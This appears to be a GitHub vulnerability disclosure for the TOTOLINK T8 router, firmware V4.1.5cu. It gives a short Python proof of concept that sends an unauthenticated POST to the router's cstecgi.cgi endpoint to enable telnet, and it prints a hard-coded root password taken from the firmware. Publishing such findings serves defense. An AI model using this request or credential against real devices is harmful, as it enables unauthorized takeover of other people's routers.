Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

TOTOLINK T8 TELNET

Description

Attackers can start the Telnet service without authorization and log in to the telnet service with a hard-coded password

image-20230116184500942

Firmware information

image-20230116184157081

Affected version

Version: V4.1.5cu

Vulnerability details

Telnet is enabled by sending the following POST packet .

import requests
url = "http://192.168.0.1/cgi-bin/cstecgi.cgi"
data = '{"telnet_enabled":"1","topicurl":"setTelnetCfg"}'
rep = requests.post(url, data=data)
print(rep.status_code)
print(rep.content)

The default account password exists in the file /web_cste/cgi-bin/product.iniroot:KL@UHeZ0

image-20230116195313617

image-20230116194911323

In /bin/cs

image-20230116194625197

In bin/convertIniToCfg

image-20230116195206223

success!

image-20230116195635180